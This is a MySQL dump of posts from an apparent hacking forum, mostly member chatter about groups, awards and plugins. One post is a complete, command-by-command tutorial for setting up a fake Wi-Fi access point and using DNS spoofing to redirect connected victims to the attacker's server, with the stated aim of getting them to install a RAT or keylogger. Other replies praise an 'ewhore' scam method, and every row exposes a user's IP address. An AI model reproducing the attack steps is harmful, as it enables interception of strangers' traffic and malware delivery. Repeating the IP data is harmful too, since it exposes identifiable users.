OT: Nice update :D [/quote] How about have you banned? You seem to volunteer for everything now right so how about volunteer to get banned?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f8bd372589b70fa06a2f23a408dde17e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5913', '1027', '5909', '58', 'RE: Marketers Group Request', '0', '82', 'iTzIpod', '1350845057', 'Nice idea. Good luck. Hope it gets approved :) Would love to join', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '27e0b427468f94791d0f978e1f83da26', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5914', '1027', '5909', '58', 'RE: Marketers Group Request', '0', '1', 't3h jok3r', '1350845150', 'http://l33thacking.net/thread-212.html', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2a961f4b73198cae5972e20535e26d85', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5915', '1026', '5869', '3', 'RE: 1000 THREADS !!!!', '0', '1', 't3h jok3r', '1350845249', 'Yay! Thanks for the contributions everyone. I highly appreciate it, LH is growing fast and hopefully we will be the online best hacker community online. I have a couple of plans on advertising and promoting L33T Hacking, if you would like to help then feel free to PM me.', '72.231.24.165', '1223104677', '1', '0', '1', '1350845282', '1', 'f70916d1c9db5f09748c7f258470f936', '0', '1350845282'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5916', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1350845281', '/me is posting in the /me thread.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3b6396aa4635d2cfc6d8600ebdf3fecc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5917', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1350845351', 'Some Forum Userbars on the OP are fucked up.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8d26d62371b4c56cd6b954536ec1e466', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5918', '1026', '5869', '3', 'RE: 1000 THREADS !!!!', '0', '82', 'iTzIpod', '1350845397', 'PM me what you need. I\'ll try to do it? :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'cc4fb8616d5d77f704ea9c47d704a31d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5919', '1019', '5836', '3', 'RE: Do you like your new?', '0', '82', 'iTzIpod', '1350845633', 'I don\'t see whynot? :) Joking. -.-', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a3ef91c46a34beaa5039460ef0dd499a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5920', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '228', 'VirtualLegend', '1350845813', '[align=justify][size=medium][b][u][color=#32CD32]Name Of the Group:[/color][/u][/b] The Marketers [u][b][color=#32CD32]Group Description:[/color][/b][/u] We are a High Quality group all about Money Making. We post threads about Money Making methods like PPD, PPC, CPA etc. And we are not gonna post only threads but we are here to help people too. [u][b][color=#32CD32]Group Userbar:[/color][/b][/u] [img]http://i.imgur.com/wlfDq.png[/img] [u][b][color=#32CD32]Forum Name:[/color][/b][/u] The Marketers Palace [u][b][color=#32CD32]Forum Icon(34x34):[/color][/b][/u] [img]http://i.imgur.com/uP3eg.png[/img] [u][b][color=#32CD32]Why LH should make this group official:[/color][/b][/u] Because we don\'t have a group like this on LH. We will ensure that the Monetizing section is full of Money Making methods and tips. [/size][/align] [color=#FF0000][size=medium]I Hope that you will approve this group and that many People will join ![/size][/color]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '856d3a02085f16d82e966dd4c4bc6276', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5921', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1350846077', 'Good luck Virtual with the group. Seems nice. Wishing to join it and become successful and a great addition to LH.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ee5919147475e571e9ec4481082e13c7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5922', '1019', '5919', '3', 'RE: Do you like your new?', '0', '1', 't3h jok3r', '1350846660', '[quote=\'iTzIpod\' pid=\'5919\' dateline=\'1350845633\'] I don\'t see whynot? :) Joking. -.- [/quote] Lol as I said only staff and admins give out awards.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '793199a4a92e362a2811d4f3b1cc433a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5923', '1019', '5836', '3', 'RE: Do you like your new?', '0', '3', '??????????¢™', '1350847069', 'Yay the award system finally.', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', '23f8f175d24f9b0f4c4a6b9649281a94', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5924', '197', '696', '56', 'RE: /me Thread', '0', '3', '??????????¢™', '1350847132', '/me says \"t3h jok3r get on skype ASAP please.\"', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', 'fd420406e253ed59d373765744b1634e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5925', '212', '5921', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '228', 'VirtualLegend', '1350847250', '[quote=\'iTzIpod\' pid=\'5921\' dateline=\'1350846077\'] Good luck Virtual with the group. Seems nice. Wishing to join it and become successful and a great addition to LH. [/quote] If the group is official i will add you as a member.', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'e1a843719930d83f8f772feafd6438fb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5926', '998', '5649', '12', 'RE: Port Scanning Tutorial', '0', '4', 'Triple H', '1350847297', 'Looks amazing. Thanks for the script and explanation.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '75c5f5f2c592aba6d4b9538fc49be2f7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5927', '993', '5595', '12', 'RE: Most complete guide to be anonymous', '0', '4', 'Triple H', '1350847425', 'Love the layout. Thanks a bunch i learned a lot today', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '55906f41e06d6633a9ad437b79a30acb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5928', '1028', '0', '12', '[Tutorial] How to create a Fake Prank Wifi Access Point', '0', '4', 'Triple H', '1350847562', '[align=center][b]How to create a Fake Prank Wifi Access Point [/b][/align] Here\'s the deal: how would you like to create a fake access point named, say Wifi Hotspot, and have people connect to YOU. From there, you can mess around with them, DNS spoof them to websites, or even your own web server convincing them to download your RAT/keylogger. Or how about monitoring all their websites and network traffic? I won\'t show you all of this, but I\'ll show you some. Now the tutorial!! This is for educational purposes only. Please stay ethical with this and always get permission before you do something. I know you will ignore my plea for righteousness, but really, stay ethical. It will pay off in the long term! Now, let me give a brief overview of what we are going to accomplish here. We will create a fake access point with whatever name you like, and provide any person that connects to it with internet access, so they will think they are on a legitimate access point! Then from there, we can do many things do the client. TABLE OF CONTENTS: WHAT WE NEED STEP ONE: GETTING THE DHCP3 SERVER STEP TWO: CONFIGURING THE DHCP3 SERVER STEP THREE: SETTING UP THE FAKE ACCESS POINT AND RUNNING THE DHCP3 SERVER STEP FOUR: SETTING UP IPTABLES SO THAT CLIENT CAN HAVE INTERNET ACCESS STEP FIVE: SCREWING WITH PEOPLE WHAT WE NEED: 1. Two wireless interfaces. (An external USB wifi adapter, plus your internal wifi laptop adapter) A good external wifi adapter is the ALFA AWUS036H. It\'s the one I use. You can get one for about 25 dollars on Amazon. 2. Backtrack 5 R2 (R1 should work, but this was tested on R2) 3. A brain please. STEP ONE: GETTING THE DHCP3 SERVER We need to update Backtrack and then install the dhcp3 server. Code: [code]apt-get update && apt-get upgrade && apt-get dist-upgrade [/code] Code: [code]apt-get install dhcp3-server [/code] Cool we got all the stuff we need! We are ready to begin our attack. Please make sure that your laptop interface (should be wlan0) is connected to your own router. Make sure that your external interface is plugged in and ready to go (this one should be wlan1). STEP TWO: CONFIGURING THE DHCP3 SERVER We must begin the process of configuring our dhcp3 server so that our clients will receive an IP address when they connect. I expect your laptop interface to be connected to your router right now, and the external interface plugged in but not connected to any router, so we will run a check to determine our DNS address. Code: [code]cat /etc/resolv.conf[/code] See that IP address printed after \"nameserver\"? That\'s the DNS address. Please take note of it. In the soon following code, we will replace $dns with the DNS address you saw in the previous command. Code: [code]gedit /etc/dhcp3/dhcpd.conf[/code] If you are using Backtrack 5 KDE version, type this instead: Code: [code]kwrite /etc/dhcp3/dhcpd.conf[/code] If kwrite doesn\'t work, replace it with kate. Now we have a text editor open with some text in it. Delete everything you see, and replace it with this: Code: [code]ddns-update-style ad-hoc; default-lease-time 600; max-lease-time 7200; authoritative; subnet 192.168.2.128 netmask 255.255.255.128 { option subnet-mask 255.255.255.128; option broadcast-address 192.168.2.255; option routers 192.168.2.129; option domain-name-servers $dns; range 192.168.2.130 192.168.2.140; }[/code] Remember to replace $dns with your DNS address you learned earlier!!! So a possible line will look like this: Code: [code]option domain-name-servers 192.168.0.1;[/code] STEP THREE: SET UP THE FAKE ACCESS POINT AND RUN THE DHCP3 SERVER Let\'s configure our wireless interfaces shall we? We need to put our external interface into monitor mode. If you don\'t know the names of your interfaces, type \"ifconfig\" without quotes, and it will show you. In my situation, the external interface is wlan1, so just replace that with YOUR external interface. Code: [code]airmon-ng start wlan1[/code] Code: [code]airbase-ng -e \"NAME OF ACCESS POINT HERE\" -c 9 mon0[/code] Now open a new terminal and type the following code which will set up our fake access point along with the dhcp3 server. Be sure to enter each command separately. Code: [code]ifconfig at0 up ifconfig at0 192.168.2.129 netmask 255.255.255.128 route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129 mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd echo > \'/var/lib/dhcp3/dhcpd.leases\' dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0 [/code] You should now have two terminals running. One with airbase-ng maintaining your fake access point, and another with the dhcp3 server open. We now need to set up our iptables to let our clients gain internet access. STEP FOUR: SET UP IPTABLES SO THAT CLIENT CAN HAVE INTERNET ACCESS Your laptop interface should be connected to your router!! I am assuming your laptop interface is wlan0, but if not, type ifconfig to see which one it is. If you don\'t know what it is, you should close out of this tutorial. There are some variables in this next code you will need to replace yourself. I will tell you how and which. We need to find your gateway address. Type the following into a new terminal: Code: [code]route | grep \"default\"[/code] See that IP address next to \"default\"? That is your gateway IP address, and you should take note of it. It should, in most cases, be the same as your DNS address. Remember your laptop interface? It should be wlan0, if not, you should know what it is. In the following code, replace $interface with your laptop interface, and $gateway with your gateway IP address. Be sure to enter each command separately (yes a lot of copy and pasting). Code: [code]echo 1 > /proc/sys/net/ipv4/ip_forward iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables --table nat --append POSTROUTING --out-interface $interface -j MASQUERADE iptables -A INPUT -i [+] -j ACCEPT iptables -A OUTPUT -o [+] -j ACCEPT iptables --append FORWARD --in-interface at0 -j ACCEPT iptables -t nat -A PREROUTING -p udp -j DNAT --to $gateway[/code] Congratulations!!! You have set up a fake access point with WORKING internet connection. Go ahead, give it a try using another computer and connect to your access point! STEP FIVE: SCREWING WITH PEOPLE Now that our client(s) is connected to YOU, you can do whatever you want to them! One of my favorites is the use of DNS spoofing. While your clients are connected to you, you can redirect whatever website they visit to whatever website you want them to go. Or, even better, you can redirect them to your own web server on your computer that could convince them to download a RAT or keylogger. I will show you how to perform a simple DNS spoofing attack on your client. Create a file in your ROOT folder named spoof. Enter the following text into that file. Code: [code]192.168.2.129 *[/code] Now we initiate the DNS spoofing attack. This will redirect every website our client visits to YOU. So if you are running your own web server on your computer, they will be redirected to that web server. This is great for Java Applet attacks and other Social Engineering Toolkit stuff! Use the search option at the top of this website to find out more. Code: [code]dnsspoof -i at0 -f /root/spoof[/code] There, now every website they will visit will be redirected back to your own web server! Note, if you want this attack to be more flexible, edit the spoof file you created earlier. 192.168.2.129 is the IP address you want to redirect them to. The parameter after that is the website you want to be redirected. For example, if I want to redirect my client\'s requests for google.com to yahoo.com, I would enter the following in my spoof file. Code: [code]98.139.183.24 google.com[/code] Here, 98.139.183.24 is the IP address of yahoo.com. You can find the IP address of websites by pinging them in the terminal. Code: [code]ping yahoo.com[/code] This is the end of my tutorial. I hope you found it informative, as well as a fresh new way of performing wireless attacks. There are myriad ways you can leverage this attack to perform all sorts of man-in-the-middle attacks, but I leave that up to you to research. I did the hard part for you, so now it\'s up to you to figure out the rest! Please say thanks!', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9e114faf9efd6a54885376b4b3dd8be7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5929', '963', '5430', '17', 'RE: ??SIEGRIED\'S EWHORE METHOD ??', '0', '4', 'Triple H', '1350847655', 'Nice method thanks and the image link doesn\'t work.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b92bcdbcd3faad631faac424df21cef0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5930', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '228', 'VirtualLegend', '1350848314', 'Can you make me a userbar for my upcoming group Marketers Size: Idk the size of a Userbar Colour Scheme: Green Render/Image: Dollar image Text: Marketers Anything else: Suprise me Contact me on skype when ur done of when ur stuck', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'b8cce4acd7313a20c3276b3e8f151d06', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5931', '963', '5430', '17', 'RE: ??SIEGRIED\'S EWHORE METHOD ??', '0', '257', 'XxTREYZxX', '1350848603', 'thanks for the great share mate appreciate it :O', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '54e5c8f82b675cfec3c0a9f03a229950', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5932', '1028', '5928', '12', 'RE: [Tutorial] How to create a Fake Prank Wifi Access Point', '0', '257', 'XxTREYZxX', '1350848734', 'ahah thanks for the great share mate i love it :O', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '44e64d090a79ca56114c0a75976ba72d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5933', '998', '5649', '12', 'RE: Port Scanning Tutorial', '0', '257', 'XxTREYZxX', '1350850750', 'thanks for the great share mate :O really well designed', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', 'efb54083aa00dcb0f928651c6d1ecc8b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5934', '1019', '5836', '3', 'RE: Do you like your new?', '0', '82', 'iTzIpod', '1350850766', 'ELite/Upgraded Award Icon is fucked up.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '51e7639361abf1aac1f7ec3b55ff9ccd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5935', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1350850797', '/me saw t3h jok3r on Skype. But didn\'t say anything..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e38cbe9ee8a4f0598cfa64b2a959c2b4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5936', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1350850827', 'Okay thank you VirtualLegend! :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '08482192d1261a5a91de2200dc8335bd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5937', '1019', '5836', '3', 'RE: Do you like your new?', '0', '257', 'XxTREYZxX', '1350851182', 'Yeah the elite one does not work...so yeah.', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', 'eb0edb6d2ad20d7a35c5fad604d24632', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5938', '1026', '5869', '3', 'RE: 1000 THREADS !!!!', '0', '257', 'XxTREYZxX', '1350851261', 'Thanks everyone for joining this site and being active :)', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '69c7addbd639bb4cadd38b097c70aa5c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5939', '1018', '5892', '47', 'RE: giving away premium account', '0', '257', 'XxTREYZxX', '1350851522', '[quote=\'iTzIpod\' pid=\'5892\' dateline=\'1350835352\'] I should get this account because I was one of the first 100 members on this site. #82 And also, I have the most posts on LH and contributed A LOT to this forum. Most of my posts tend to be HQ and Grammar and Spelling Free. MOST. And also, I have referred about 10 or 15 members on this site. I am planning on referring more. I have probably the best Usergroup on LH. Or had... Unique!! :) [/quote] pm\'ing you right now congrats mate', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '49d3e659e445b66b7390b6b696327d41', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5940', '1009', '5887', '74', 'RE: minecraft server setup tut', '0', '257', 'XxTREYZxX', '1350851832', '[quote=\'iTzIpod\' pid=\'5887\' dateline=\'1350834860\'] Made a new Minecraft Server! :) Thanks again. Probably the most HQ post you made so far in my opinion. Others are just LQ or so. [/quote] Thanks mate :O appreciated lol', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '0d92ad703e35f6006b734f61cb932a3e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5941', '1026', '5869', '3', 'RE: 1000 THREADS !!!!', '0', '222', 'Exposé', '1350853095', 'Congrats everyone. Hope we can get some more hq members around here :) and grow', '66.87.31.245', '1113006069', '0', '0', '0', '0', '1', '57874a368a55d8318aaafa9173e55177', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5942', '197', '696', '56', 'RE: /me Thread', '0', '222', 'Exposé', '1350853244', '/me has to work until 9:30. KMN', '66.87.31.245', '1113006069', '0', '0', '0', '0', '1', 'e0c3d6ce3a5159d27847b66fb2f2b01a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5943', '1019', '5836', '3', 'RE: Do you like your new?', '0', '222', 'Exposé', '1350853468', 'Love how itzipod has like every award...', '66.87.31.245', '1113006069', '0', '0', '0', '0', '1', '2a3c6968ab4c8ee1a1b084ad17ebf74b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5944', '1019', '5836', '3', 'RE: Do you like your new?', '0', '62', 'R?????zo?', '1350853553', 'I have almost no awards :/ but I like the icon centered, looks awesome :D', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '4110c5acf8e1f32b33a0e9d9ec3a3809', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5945', '413', '1899', '29', 'RE: EARN $50/HOUR EASILY', '0', '228', 'VirtualLegend', '1350854570', 'Making money with a GPT site is the worst method on the internet. But nice share', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '90b15a77c3c6e08cd23b8c50913ce120', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5946', '689', '3511', '19', '[Junk]Test', '0', '228', 'VirtualLegend', '1350855840', 'This thread has been junked.', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5947', '1029', '0', '2', 'Testing new plugin v.1', '0', '1', 't3h jok3r', '1350856892', '[lock]http://facebook.com[/lock]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f494118bb4d39ff10500a5bd2f670d56', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5948', '1030', '0', '2', 'Testing new plugin v.2', '0', '1', 't3h jok3r', '1350857082', '[lock]Hi there[/lock]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '09646f7401b10571bd67670e7a3f7c3e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5949', '1030', '5948', '2', 'RE: Testing new plugin v.2', '0', '3', '??????????¢™', '1350857254', 'I dont think it worked?', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', '85560512e35de7feab55963af1481c73', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5950', '1030', '5948', '2', 'RE: Testing new plugin v.2', '0', '1', 't3h jok3r', '1350857295', 'Still working on it. It\'s an old plugin.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'cfb6cf399c1da9cf18889bddb4081232', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5951', '1031', '0', '7', 'Testing new plugin public', '0', '1', 't3h jok3r', '1350857627', '[lock]Sup people[/lock]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c2a0b8c64d504ccc8cc96b191aa5c1da', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5952', '1031', '5951', '7', 'RE: Testing new plugin public', '0', '228', 